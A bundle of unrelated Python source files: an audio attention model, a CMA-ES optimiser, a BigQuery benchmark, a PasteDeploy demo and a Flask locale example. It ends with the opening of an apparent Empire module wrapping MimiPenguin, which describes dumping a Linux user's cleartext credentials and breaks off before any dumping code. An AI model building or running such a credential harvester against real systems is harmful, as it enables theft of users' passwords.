"""Puts data, and lengths into a packed_padded_sequence then returns
the packed_padded_sequence and the labels. Set use_lengths to True
to use this collate function.
Args:
batch: (list of tuples) [(audio, target)].
audio is a FloatTensor
target is a LongTensor with a length of 8
Output:
packed_batch: (PackedSequence), see torch.nn.utils.rnn.pack_padded_sequence
labels: (Tensor), labels from the file names of the wav.
"""
if len(batch) == 1:
sigs, labels = batch[0][0], batch[0][1]
sigs = sigs.t()
lengths = [sigs.size(0)]
sigs.unsqueeze_(0)
labels.unsqueeze_(0)
if len(batch) > 1:
sigs, labels, lengths = zip(*[(a.t(), b, a.size(1)) for (a,b) in sorted(batch, key=lambda x: x[0].size(1), reverse=True)])
max_len, n_feats = sigs[0].size()
sigs = [torch.cat((s, torch.zeros(max_len - s.size(0), n_feats)), 0) if s.size(0) != max_len else s for s in sigs]
sigs = torch.stack(sigs, 0)
labels = torch.stack(labels, 0)
packed_batch = pack(Variable(sigs), lengths, batch_first=True)
return packed_batch, labels
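# Usage sketch (not wired up below): this collate function is meant to be
# passed to the DataLoader, e.g.
#   dl = data.DataLoader(ds, batch_size=batch_size, collate_fn=pad_packed_collate)
# The training loop further down uses the default collate instead, which works
# here because tat.PadTrim gives every signal the same length.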
def unpack_lengths(batch_sizes):
"""taken directly from pad_packed_sequence()
"""
lengths = []
data_offset = 0
prev_batch_size = batch_sizes[0]
for i, batch_size in enumerate(batch_sizes):
dec = prev_batch_size - batch_size
if dec > 0:
lengths.extend((i,) * dec)
prev_batch_size = batch_size
lengths.extend((i + 1,) * batch_size)
lengths.reverse()
return lengths
class EncoderRNN2(nn.Module):
def __init__(self, input_size, hidden_size, n_layers=1, batch_size=1):
super(EncoderRNN2, self).__init__()
self.n_layers = n_layers
self.hidden_size = hidden_size
self.batch_size = batch_size
self.gru = nn.GRU(input_size, hidden_size, n_layers, batch_first=True)
def forward(self, input, hidden):
output = input
output, hidden = self.gru(output, hidden)
#print("encoder:", output.size(), hidden.size())
return output, hidden
def initHidden(self, ttype=None):
if ttype == None:
ttype = torch.FloatTensor
result = Variable(ttype(self.n_layers * 1, self.batch_size, self.hidden_size).fill_(0))
if use_cuda:
return result.cuda()
else:
return result
class Attn(nn.Module):
def __init__(self, hidden_size, batch_size=1, method="dot"):
super(Attn, self).__init__()
self.method = method
self.hidden_size = hidden_size
self.batch_size = batch_size
if self.method == 'general':
self.attn = nn.Linear(self.hidden_size, hidden_size, bias=False)
elif self.method == 'concat':
self.attn = nn.Linear(self.hidden_size * 2, hidden_size, bias=False)
self.v = nn.Parameter(torch.FloatTensor(batch_size, 1, hidden_size))
def forward(self, hidden, encoder_outputs):
max_len = encoder_outputs.size(1)
# get attn energies in one batch
attn_energies = self.score(hidden, encoder_outputs)
# Normalize energies to weights in range 0 to 1
return F.softmax(attn_energies)
def score(self, hidden, encoder_output):
#print("attn.score:", hidden.size(), encoder_output.size())
if self.method == 'general':
energy = self.attn(encoder_output)
energy = energy.transpose(2, 1)
energy = hidden.bmm(energy)
return energy
elif self.method == 'concat':
hidden = hidden * Variable(encoder_output.data.new(encoder_output.size()).fill_(1)) # broadcast hidden to encoder_outputs size
energy = self.attn(torch.cat((hidden, encoder_output), -1))
energy = energy.transpose(2, 1)
energy = self.v.bmm(energy)
return energy
else:
#self.method == 'dot':
encoder_output = encoder_output.transpose(2, 1)
energy = hidden.bmm(encoder_output)
return energy
class LuongAttnDecoderRNN(nn.Module):
def __init__(self, hidden_size, output_size, attn_model="dot", n_layers=1, dropout=0.1, batch_size=1):
super(LuongAttnDecoderRNN, self).__init__()
# Keep for reference
self.attn_model = attn_model
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.dropout = dropout
self.batch_size = batch_size
# Define layers
self.gru = nn.GRU(hidden_size, hidden_size, n_layers, dropout=dropout, batch_first=True)
self.concat = nn.Linear(hidden_size * 2, hidden_size)
self.out = nn.Linear(hidden_size, output_size)
# Choose attention model
if attn_model != 'none':
self.attn = Attn(hidden_size, method=attn_model, batch_size=batch_size)
def forward(self, input_seq, last_hidden, encoder_outputs):
# Note: This now runs in batch but was originally run one
# step at a time
# B = batch size
# S = output length
# N = # of hidden features
# Get the embedding of the current input word (last output word)
batch_size = input_seq.size(0)
# Get current hidden state from input word and last hidden state
rnn_output, hidden = self.gru(input_seq, last_hidden)
# Calculate attention from current RNN state and all encoder outputs;
# apply to encoder outputs to get weighted average
#print("decoder:", rnn_output.size(), encoder_outputs.size())
attn_weights = self.attn(rnn_output, encoder_outputs)
context = attn_weights.bmm(encoder_outputs) # [B, S, L] dot [B, L, N] -> [B, S, N]
print(attn_weights.size(), encoder_outputs.size(), context.size())
#print("decoder context:", context.size())
# Attentional vector using the RNN hidden state and context vector
# concatenated together (Luong eq. 5)
concat_input = torch.cat((rnn_output, context), -1) # B x S x 2*N
concat_output = F.tanh(self.concat(concat_input))
# Finally predict next token (Luong eq. 6, without softmax)
output = self.out(concat_output)
# Return final output, hidden state, and attention weights (for visualization)
return output, hidden, attn_weights
# train parameters
epochs = args.epochs
# set dataset parameters
DATADIR = "/home/david/Programming/data"
sr = 8000
ws = args.window_size
hs = ws // 2
n_fft = 512 # 256
n_filterbanks = 26
n_coefficients = 12
low_mel_freq = 0
high_freq_mel = (2595 * np.log10(1 + (sr/2) / 700))
mel_pts = np.linspace(low_mel_freq, high_freq_mel, n_filterbanks + 2)
hz_pts = np.floor(700 * (10**(mel_pts / 2595) - 1))
bins = np.floor((n_fft + 1) * hz_pts / sr)
# data transformations
td = {
"RfftPow": RfftPow(n_fft),
"FilterBanks": FilterBanks(n_filterbanks, bins),
"MFCC": MFCC(n_filterbanks, n_coefficients),
}
transforms = tat.Compose([
tat.Scale(),
tat.PadTrim(58000, fill_value=1e-8),
Preemphasis(),
Sig2Features(ws, hs, td),
])
# set network parameters
use_cuda = torch.cuda.is_available()
batch_size = args.batch_size
input_features = 26
hidden_size = 100
output_size = 3
#output_length = (8 + 7 + 2) # with "blanks"
output_length = 8 # without blanks
n_layers = 1
attn_modus = "dot"
# build networks, criterion, optimizers, dataset and dataloader
encoder2 = EncoderRNN2(input_features, hidden_size, n_layers=n_layers, batch_size=batch_size)
decoder2 = LuongAttnDecoderRNN(hidden_size, output_size, n_layers=n_layers, attn_model=attn_modus, batch_size=batch_size)
print(encoder2)
print(decoder2)
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.RMSprop([
{"params": encoder2.parameters()},
{"params": decoder2.parameters(), "lr": 0.0001}
], lr=0.001, momentum=0.9)
scheduler = lr_scheduler.StepLR(optimizer, step_size=80, gamma=0.6)
ds = torchaudio.datasets.YESNO(DATADIR, transform=transforms, target_transform=Labeler())
dl = data.DataLoader(ds, batch_size=batch_size)
if use_cuda:
print("using CUDA: {}".format(use_cuda))
encoder2 = encoder2.cuda()
decoder2 = decoder2.cuda()
loss_total = []
# begin training
for epoch in range(epochs):
scheduler.step()
print("epoch {}".format(epoch+1))
running_loss = 0
loss_epoch = []
for i, (mb, tgts) in enumerate(dl):
# set model into train mode and clear gradients
encoder2.train()
decoder2.train()
encoder2.zero_grad()
decoder2.zero_grad()
# set inputs and targets
mb = mb.transpose(2, 1) # [B x N x L] -> [B, L, N]
if use_cuda:
mb, tgts = mb.cuda(), tgts.cuda()
mb, tgts = Variable(mb), Variable(tgts)
encoder2_hidden = encoder2.initHidden(type(mb.data))
encoder2_output, encoder2_hidden = encoder2(mb, encoder2_hidden)
#print(encoder2_output)
# Prepare input and output variables for decoder
dec_i = Variable(encoder2_output.data.new([[[0] * hidden_size] * output_length] * batch_size))
dec_h = encoder2_hidden # Use last (forward) hidden state from encoder
#print(dec_h.size())
"""
# Run through decoder one time step at a time
# collect attentions
attentions = []
outputs = []
dec_i = Variable(torch.FloatTensor([[[0] * hidden_size] * 1]))
target_seq = Variable(torch.FloatTensor([[[-1] * hidden_size]*8]))
for t in range(output_length):
#print("t:", t, dec_i.size())
dec_o, dec_h, dec_attn = decoder2(
dec_i, dec_h, encoder2_output
)
#print("decoder output", dec_o.size())
dec_i = target_seq[:,t].unsqueeze(1) # Next input is current target
outputs += [dec_o]
attentions += [dec_attn]
dec_o = torch.cat(outputs, 1)
dec_attn = torch.cat(attentions, 1)
"""
# run through decoder in one shot
dec_o, dec_h, dec_attn = decoder2(dec_i, dec_h, encoder2_output)
# calculate loss and backprop
loss = criterion(dec_o.view(-1, output_size), tgts.view(-1))
running_loss += loss.data[0]
loss_epoch += [loss.data[0]]
loss.backward()
#nn.utils.clip_grad_norm(encoder2.parameters(), 0.05)
#nn.utils.clip_grad_norm(decoder2.parameters(), 0.05)
optimizer.step()
# logging stuff
if (i % args.log_interval == 0 and i != 0) or epoch == 0:
print(loss.data[0])
loss_total += [loss_epoch]
print((dec_o.max(2)[1].data == tgts.data).float().sum(1) / tgts.size(1))
print("ave loss of {} at epoch {}".format(running_loss / (i+1), epoch+1))
loss_total = np.array(loss_total)
plt.figure()
plt.plot(loss_total.mean(1))
plt.savefig("pytorch_attention_audio-loss.png")
# Set up figure with colorbar
attn_plot = dec_attn[0, :, :].data
attn_plot = attn_plot.numpy() if not use_cuda else attn_plot.cpu().numpy()
fig = plt.figure(figsize=(20, 6))
ax = fig.add_subplot(111)
cax = ax.matshow(attn_plot, cmap='bone', aspect="auto")
fig.colorbar(cax)
fig.savefig("pytorch_attention_audio-attention.png")
| {
"content_hash": "13c93cf7ddbf8ee3ac87d89b77be4f0b",
"timestamp": "",
"source": "github",
"line_count": 551,
"max_line_length": 138,
"avg_line_length": 33.524500907441016,
"alnum_prop": 0.5889995669120831,
"repo_name": "dhpollack/programming_notebooks",
"id": "978b011b224012b04df51bc99977125c401506f7",
"size": "18473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pytorch_attention_audio.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "4736"
},
{
"name": "CMake",
"bytes": "228"
},
{
"name": "Jupyter Notebook",
"bytes": "22640441"
},
{
"name": "Python",
"bytes": "21946"
}
],
"symlink_target": ""
} |
"""A module that provides support for the Covariance Matrix Adaptation
Evolution Strategy.
"""
import copy
import logging
import math
import numpy
import random # Only used to seed numpy.random
import sys # Used to get maxint
numpy.random.seed(random.randint(0, sys.maxint))
_logger = logging.getLogger("eap.cma")
def esCMA(toolbox, population, sigma, ngen, halloffame=None, **kargs):
"""The CMA-ES algorithm as described in Hansen, N. (2006). *The CMA
    Evolution Strategy: A Comparing Review.*
    The provided *population* should be a list of one or more individuals. The
    other keyword arguments are passed to the class
:class:`~eap.cma.CMAStrategy`.
"""
_logger.info("Start of evolution")
strategy = CMAStrategy(population, sigma, kargs) # Initialize the strategy
for g in xrange(ngen):
_logger.info("Evolving generation %i", g)
# Replace the whole population with the generated individuals from the
# cma strategy
population[:] = strategy.generate()
# Evaluate the individuals
for ind in population:
ind.fitness.values = toolbox.evaluate(ind)
if halloffame is not None:
halloffame.update(population)
# Update the Strategy with the evaluated individuals
strategy.update(population)
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in population]
length = len(population)
mean = sum(fits) / length
sum2 = sum(fit**2 for fit in fits)
std_dev = abs(sum2 / length - mean**2)**0.5
_logger.debug("Min %f", min(fits))
_logger.debug("Max %f", max(fits))
_logger.debug("Mean %f", mean)
_logger.debug("Std. Dev. %f", std_dev)
_logger.info("End of (successful) evolution")
class CMAStrategy(object):
"""
    Additional configuration may be passed through the *params* argument as a
dictionary,
+----------------+---------------------------+----------------------------+
| Parameter | Default | Details |
+================+===========================+============================+
| ``lambda_`` | ``floor(4 + 3 * log(N))`` | Number of children to |
| | | produce at each generation,|
| | | ``N`` is the individual's |
| | | size. |
+----------------+---------------------------+----------------------------+
| ``mu`` | ``floor(lambda_ / 2)`` | The number of parents to |
| | | keep from the |
| | | lambda children. |
+----------------+---------------------------+----------------------------+
| ``weights`` | ``"superlinear"`` | Decrease speed, can be |
| | | ``"superlinear"``, |
| | | ``"linear"`` or |
| | | ``"equal"``. |
+----------------+---------------------------+----------------------------+
| ``cs`` | ``(mueff + 2) / | Cumulation constant for |
| | (N + mueff + 3)`` | step-size. |
+----------------+---------------------------+----------------------------+
| ``damps`` | ``1 + 2 * max(0, sqrt(( | Damping for step-size. |
| | mueff - 1) / (N + 1)) - 1)| |
| | + cs`` | |
+----------------+---------------------------+----------------------------+
| ``ccum`` | ``4 / (N + 4)`` | Cumulation constant for |
| | | covariance matrix. |
+----------------+---------------------------+----------------------------+
| ``ccov1`` | ``2 / ((N + 1.3)^2 + | Learning rate for rank-one |
| | mueff)`` | update. |
+----------------+---------------------------+----------------------------+
| ``ccovmu`` | ``2 * (mueff - 2 + 1 / | Learning rate for rank-mu |
| | mueff) / ((N + 2)^2 + | update. |
| | mueff)`` | |
+----------------+---------------------------+----------------------------+
"""
def __init__(self, population, sigma, params={}):
# Create a centroid individual
self.centroid = copy.deepcopy(population[0])
# Clear its content
self.centroid[:] = self.centroid[0:0]
# The centroid is used in new individual creation
self.centroid.extend(numpy.mean(population, 0))
self.dim = len(self.centroid)
self.sigma = sigma
self.pc = numpy.zeros(self.dim)
self.ps = numpy.zeros(self.dim)
self.chiN = math.sqrt(self.dim) * (1 - 1. / (4. * self.dim) + \
1. / (21. * self.dim**2))
self.B = numpy.identity(self.dim)
self.C = numpy.identity(self.dim)
self.diagD = numpy.ones(self.dim)
self.BD = self.B * self.diagD
self.lambda_ = params.get("lambda_", int(4 + 3 * math.log(self.dim)))
self.update_count = 0
self.params = params
self.computeParams(self.params)
def generate(self):
"""Generate lambda offsprings from the current strategy using the
centroid individual as parent.
"""
arz = numpy.random.randn(self.lambda_, self.dim)
offsprings = list()
empty_ind = copy.deepcopy(self.centroid) # Create an individual
del empty_ind[:] # faster to copy
for i in xrange(self.lambda_):
ind = copy.deepcopy(empty_ind)
ind.extend(self.centroid + self.sigma * numpy.dot(self.BD, arz[i]))
offsprings.append(ind)
return offsprings
def update(self, population):
"""Update the current covariance matrix strategy.
"""
sorted_pop = sorted(population, key=lambda ind: ind.fitness,
reverse=True)
old_centroid = numpy.array(self.centroid)
centroid = numpy.dot(self.weights, sorted_pop[0:self.mu])
del self.centroid[:] # Clear the centroid individual
self.centroid.extend(centroid)
c_diff = centroid - old_centroid
# Cumulation : update evolution path
self.ps = (1 - self.cs) * self.ps \
+ math.sqrt(self.cs * (2 - self.cs) * self.mueff) / self.sigma \
* numpy.dot(self.B, (1. / self.diagD) \
* numpy.dot(self.B.T, c_diff))
hsig = numpy.linalg.norm(self.ps) \
/ math.sqrt(1 - (1 - self.cs)**(2 * self.update_count)) \
/ self.chiN < 1.4 + 2 / (self.dim + 1)
self.update_count += 1
self.pc = (1 - self.cc) * self.pc \
+ hsig * (math.sqrt(self.cc * (2 - self.cc) * self.mueff) / \
self.sigma) * c_diff
# Update covariance matrix
artmp = sorted_pop[0:self.mu] - old_centroid
self.C = (1 - self.ccov1 - self.ccovmu + (1 - hsig) \
* self.ccov1 * self.cc * (2 - self.cc)) * self.C \
+ numpy.outer(self.ccov1 * self.pc, self.pc) \
+ self.ccovmu \
* numpy.dot(artmp.T , (self.weights * artmp.T).T) \
/ self.sigma**2
self.sigma *= numpy.exp((numpy.linalg.norm(self.ps) / self.chiN - 1.) \
* self.cs / self.damps)
self.diagD, self.B = numpy.linalg.eigh(self.C)
indx = numpy.argsort(self.diagD)
self.diagD = self.diagD[indx]
self.diagD **= 0.5
self.B = self.B[:,indx]
self.BD = self.B * self.diagD
def computeParams(self, params):
"""Those parameters depends on lambda and need to computed again if it
changes during evolution.
"""
self.mu = params.get("mu", self.lambda_ / 2)
rweights = params.get("weights", "superlinear")
if rweights == "superlinear":
self.weights = math.log(self.mu + 0.5) - \
numpy.log(numpy.arange(1, self.mu + 1))
elif rweights == "linear":
self.weights = self.mu + 0.5 - numpy.arange(1, self.mu + 1)
elif rweights == "equal":
self.weights = numpy.ones(self.mu)
else:
pass # Print some warning ?
self.weights /= sum(self.weights)
self.mueff = 1. / sum(self.weights**2)
self.cc = params.get("ccum", 4. / (self.dim + 4.))
self.cs = params.get("cs", (self.mueff + 2.) /
(self.dim + self.mueff + 3.))
self.ccov1 = params.get("ccov1", 2. / ((self.dim + 1.3)**2 + \
self.mueff))
self.ccovmu = params.get("ccovmu", 2. * (self.mueff - 2. + \
1. / self.mueff) / \
((self.dim + 2.)**2 + self.mueff))
self.ccovmu = min(1 - self.ccov1, self.ccovmu)
self.damps = 1. + 2. * max(0, math.sqrt((self.mueff - 1.) / \
(self.dim + 1.)) - 1.) + self.cs
self.damps = params.get("damps", self.damps)
def rand(individual):
"""Random test objective function."""
return numpy.random.random()
def plane(individual):
"""Plane test objective function."""
return individual[0]
def rastrigin(individual):
"""Rastrigin test objective function. Consider using ``lambda_ = 20 * N``
for this test function.
"""
return 10 * len(individual) + sum(gene * gene - 10 * \
math.cos(2 * math.pi * gene) for gene in individual)
def sphere(individual):
"""Sphere test objective function."""
return sum(gene * gene for gene in individual)
def cigar(individual):
"""Cigar test objective function."""
return individual[0]**2 + 1e6 * sum(gene * gene for gene in individual)
def rosenbrock(individual):
"""Rosenbrock test objective function."""
return sum(100 * (x * x - y)**2 + (1. - x)**2 \
for x, y in zip(individual[:-1], individual[1:]))
| {
"content_hash": "6bd56da840762f6471f67e867deec9b7",
"timestamp": "",
"source": "github",
"line_count": 251,
"max_line_length": 80,
"avg_line_length": 43.63745019920319,
"alnum_prop": 0.44499223956906786,
"repo_name": "rainest/dance-partner-matching",
"id": "0729f45645c6e48d1e2c06f7e4a2f6693ab3a40b",
"size": "11858",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "eap/cma.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "1745363"
},
{
"name": "Shell",
"bytes": "348"
}
],
"symlink_target": ""
} |
"""Runs a BigQuery TensorFlow connector benchmark."""
import time
from absl import app
from absl import flags
from google.cloud import bigquery
import tensorflow as tf
from tensorflow.python.framework import dtypes
from tensorflow_io.bigquery import BigQueryClient
FLAGS = flags.FLAGS
flags.DEFINE_string("project_id", None,
"GCP project id benchmark is run under.")
flags.mark_flag_as_required("project_id")
flags.DEFINE_string("dataset_project_id", "bigquery-public-data",
"GCP project where dataset is located.")
flags.DEFINE_string("dataset_id", "baseball", "Dataset id.")
flags.DEFINE_string("table_id", "games_wide", "Table id.")
flags.DEFINE_integer("num_iterations", 1000, "Number of batches to load.")
flags.DEFINE_integer("num_warmup_iterations", 10,
"Number of warmup batches to load that doesn't count "
"towards benchmark results.")
flags.DEFINE_integer("requested_streams", 1, "Number of streams.")
flags.DEFINE_integer("batch_size", 2048, "Batch size.")
flags.DEFINE_integer("prefetch_size", None, "Prefetch size.")
flags.DEFINE_integer(
"mini_batch_size", 100, "Mini batch size - to divide num_iterations."
)
flags.DEFINE_integer("num_columns", 120, "Number of columns to read.")
flags.DEFINE_bool(
"sloppy",
False,
"If True the implementation is allowed, for the sake of expediency, "
"to produce elements in a non-deterministic order",
)
flags.DEFINE_enum("format", "AVRO", ["AVRO", "ARROW"],
"Serialization format - AVRO or ARROW")
def convert_field_type(field_type):
if field_type == "STRING":
return dtypes.string
if field_type == "INTEGER":
return dtypes.int64
if field_type == "TIMESTAMP":
return dtypes.int64
raise ValueError(f"unsupported field_type:{field_type}")
def get_dataset_schema(dataset_project_id, dataset_id, table_id):
client = bigquery.Client(project=FLAGS.project_id)
dataset_ref = client.dataset(dataset_id, project=dataset_project_id)
table_ref = dataset_ref.table(table_id)
table = client.get_table(table_ref)
column_names = [field.name for field in table.schema]
output_types = [convert_field_type(field.field_type)
for field in table.schema]
return (column_names, output_types)
def get_dataset_from_bigquery(dataset_project_id, dataset_id, table_id):
"""Reads data from BigQuery and returns it as a TensorFlow dataset."""
(selected_fields, output_types) = get_dataset_schema(
dataset_project_id,
dataset_id,
table_id)
client = BigQueryClient()
read_session = client.read_session(
"projects/" + FLAGS.project_id,
dataset_project_id,
table_id,
dataset_id,
selected_fields=selected_fields,
output_types=output_types,
requested_streams=FLAGS.requested_streams,
data_format=BigQueryClient.DataFormat[FLAGS.format])
streams = read_session.get_streams()
print(
"Requested %d streams, BigQuery returned %d streams"
% (FLAGS.requested_streams, len(streams))
)
def read_rows(stream):
dataset = read_session.read_rows(stream)
if FLAGS.batch_size != 1:
dataset = dataset.batch(FLAGS.batch_size)
return dataset
streams_count = tf.size(streams)
streams_count64 = tf.cast(streams_count, dtype=tf.int64)
streams_ds = tf.data.Dataset.from_tensor_slices(streams)
dataset = streams_ds.interleave(
read_rows,
cycle_length=streams_count64,
num_parallel_calls=streams_count64,
deterministic=not FLAGS.sloppy)
if FLAGS.prefetch_size is not None:
dataset = dataset.prefetch(FLAGS.prefetch_size)
return dataset.repeat()
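# Each BigQuery storage stream becomes its own sub-dataset via read_rows();
# interleave() then pulls batches from all streams in parallel
# (cycle_length == stream count), and --sloppy relaxes ordering for throughput.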
def run_benchmark(_):
"""Runs a BigQuery TensorFlow Connector benchmark."""
dataset = get_dataset_from_bigquery(FLAGS.dataset_project_id,
FLAGS.dataset_id,
FLAGS.table_id)
num_iterations = FLAGS.num_iterations
batch_size = FLAGS.batch_size
itr = tf.compat.v1.data.make_one_shot_iterator(dataset)
mini_batch = FLAGS.mini_batch_size
print("Started benchmark warmup")
for _ in range(FLAGS.num_warmup_iterations):
_ = itr.get_next()
print("Started benchmark")
n = 0
start = time.time()
for _ in range(num_iterations // mini_batch):
local_start = time.time()
start_n = n
for _ in range(mini_batch):
n += batch_size
_ = itr.get_next()
local_end = time.time()
print(
"Processed %d entries in %f seconds. [%f] rows/s"
% (
n - start_n,
local_end - local_start,
(mini_batch * batch_size) / (local_end - local_start),
)
)
end = time.time()
print("Processed %d entries in %f seconds. [%f] rows/s" %
(n, end - start, n / (end - start)))
print("Benchmark result: [%f] rows/s" % (n / (end - start)))
# Run as:
# pylint: disable=line-too-long
# python3 test_runner.py --project_id=<your project id> --batch_size=2048 --num_iterations=100 --mini_batch_size=10 --num_columns=120 --requested_streams=20
if __name__ == "__main__":
app.run(run_benchmark)
| {
"content_hash": "c67eb716b0ef40777f6f597a32f45672",
"timestamp": "",
"source": "github",
"line_count": 156,
"max_line_length": 156,
"avg_line_length": 32.955128205128204,
"alnum_prop": 0.663100564092589,
"repo_name": "GoogleCloudPlatform/PerfKitBenchmarker",
"id": "dec08933a8176a24cb18b971f7c680b185bcf616",
"size": "5141",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "perfkitbenchmarker/scripts/bigquery_tensorflow_connector_test_scripts/test_runner.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3420"
},
{
"name": "HTML",
"bytes": "113073"
},
{
"name": "Jinja",
"bytes": "62005"
},
{
"name": "Lua",
"bytes": "1547"
},
{
"name": "Python",
"bytes": "6076512"
},
{
"name": "R",
"bytes": "1017"
},
{
"name": "Shell",
"bytes": "76164"
},
{
"name": "Tcl",
"bytes": "14601"
}
],
"symlink_target": ""
} |
import os
import webob.dec
import webob.exc
from webob import Request
from webob import Response
from paste.deploy import loadapp
from wsgiref.simple_server import make_server
"""
A filter class factory shall be defined such that:
0. The factory method shall return the filter class itself. By design, the
filter does not know the next app, cannot and does not initialize the class
   by itself; the framework performs that. One way to pass instance-specific
   variables is to define the filter class internally (see LogFilterV2).
A filter class (returned by the factory) shall be defined such that:
1. The __init__() accepts a single argument app, which is the next app
(callable class) in the pipeline.
2. The __call__() shall update the arguments environ and start_response, call
the next app with exactly these same two arguments. To simplify that, use
@webob.dec.wsgify() instead.
A terminal/app class factory shall be defined such that:
0. The factory method shall initialize and return an instance of the app
class. The framework does not perform or care about the initialization.
   Thus there is technically no requirement on the __init__() function. This
   also means that we can pass instance variables to the class directly,
   without relying on the internal-class hack.
A terminal/app class shall be defined such that:
0. The __init__() has no requirement, as said above. We are free to pass in
instance-specific variables we like.
1. The __call__() shall call start_response to set HTTP headers, return the
final result.
The decorator @webob.dec.wsgify() can help simplify the __call__().
Originally, we would have to write:
def __call__(self, environ, start_response):
req = Request(environ)
res = Response()
...
return res(environ, start_response)
Now we could write instead:
@webob.dec.wsgify()
def __call__(self, req): # request-taking and response-returning
res = Response()
...
return res # for terminal/app class
req.get_response(self.app) # for filter class
"""
class LogFilter(object):
def __init__(self, app):
self.app = app
pass
def __call__(self, environ, start_response):
print "filter:LogFilter is called."
return self.app(environ, start_response)
@classmethod
def factory(cls, global_conf, **kwargs):
print "in LogFilter.factory", global_conf, kwargs
return LogFilter
class LogFilterV2(object):
@classmethod
def factory(cls, global_conf, **kwargs):
print "in LogFilter.factory", global_conf, kwargs
username = kwargs['username']
password = kwargs['password']
class Filter(object):
def __init__(self, app):
self.app = app
# pass in arguments in the config file
self.username = username
self.password = password
@webob.dec.wsgify()
def __call__(self, req):
print "filter:LogFilterV2 called (username=%s, password=%s)" % (
self.username, self.password)
return req.get_response(self.app)
return Filter
class ShowVersion(object):
def __init__(self, version):
self.version = version
pass
def __call__(self, environ, start_response):
start_response("200 OK", [("Content-type", "text/plain")])
return "Paste Deploy LAB: Version = %s" % self.version
@classmethod
def factory(cls, global_conf, **kwargs):
print "in ShowVersion.factory", global_conf, kwargs
# create app class instance with arguments from config file
return ShowVersion(kwargs['version'])
class Calculator(object):
def __init__(self):
pass
@webob.dec.wsgify()
def __call__(self, req):
res = Response()
res.status = "200 OK"
res.content_type = "text/plain"
# get operands
operator = req.GET.get("operator", None)
operand1 = req.GET.get("operand1", None)
operand2 = req.GET.get("operand2", None)
print req.GET
opnd1 = int(operand1)
opnd2 = int(operand2)
if operator == u'plus':
result = opnd1 + opnd2
elif operator == u'minus':
result = opnd1 - opnd2
elif operator == u'star':
result = opnd1 * opnd2
elif operator == u'slash':
result = opnd1 / opnd2
else:
raise webob.exc.HTTPBadRequest(
"the operator %s unknown" % operator)
res.body = "%s /nRESULT= %d" % (str(req.GET), result)
return res
@classmethod
def factory(cls, global_conf, **kwargs):
print "in Calculator.factory", global_conf, kwargs
return Calculator()
if __name__ == '__main__':
configfile = "pastedeploylab.ini"
appname = "pdl"
wsgi_app = loadapp("config:%s" % os.path.abspath(configfile), appname)
server = make_server('localhost', 8080, wsgi_app)
usages = """
Usages: access these URLs using curl or httpie:
http://127.0.0.1:8080/
http://127.0.0.1:8080/calc?operator=plus&operand1=12&operand2=23
http://127.0.0.1:8080/admin/users/
http://127.0.0.1:8080/admin/users/1
Note: our URL routing/mapping here is naive, if /admin (no terminal '/')
is requested, the server will throw exception
'RoutesException: URL or environ must be provided'.
"""
print(usages)
server.serve_forever()
| {
"content_hash": "f5826ea5de7bc7f4240c5fc4249e093e",
"timestamp": "",
"source": "github",
"line_count": 163,
"max_line_length": 80,
"avg_line_length": 33.920245398773005,
"alnum_prop": 0.6332067281606077,
"repo_name": "sunrenjie/3rd-deadly-technotes",
"id": "6ceaf0675a349bfb7efdb8a7530cd04b0fba0da3",
"size": "5529",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "technologies/python/pastedeploylab/pastedeploylab.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "21404"
},
{
"name": "HTML",
"bytes": "733684"
},
{
"name": "Python",
"bytes": "30119"
},
{
"name": "RenderScript",
"bytes": "3279"
},
{
"name": "Roff",
"bytes": "11998"
},
{
"name": "Shell",
"bytes": "63797"
},
{
"name": "Vim script",
"bytes": "223"
},
{
"name": "Visual Basic",
"bytes": "1106"
}
],
"symlink_target": ""
} |
from flask import Flask
from flask.ext.locale import Locale, translate
app = Flask(__name__)
# app.config['DEFAULT_LOCALE'] = 'zh_CN'
locale = Locale(app)
@app.route('/')
def hello():
return translate('Hello')
@locale.localeselector
def loader():
return 'en_US'
if __name__ == "__main__":
app.run(debug=True)
| {
"content_hash": "fe19bde1a6c12fbf36705aa700410f11",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 46,
"avg_line_length": 16.4,
"alnum_prop": 0.6463414634146342,
"repo_name": "scardine/flask-locale",
"id": "c0a55149377a0b4e16541c9aee549439f7cbfebe",
"size": "328",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21774"
}
],
"symlink_target": ""
} |
from builtins import object
class Module(object):
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Linux MimiPenguin',
# list of one or more authors for the module
'Author': ['@rvrsh3ll'],
'Software': 'S0179',
'Techniques': ['T1003'],
# more verbose multi-line description of the module
'Description': ("Port of huntergregal mimipenguin. Harvest's current user's cleartext credentials."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """
from __future__ import print_function
import os
import platform
import re
import base64
import binascii
import crypt
import string
def running_as_root():
return os.geteuid() == 0
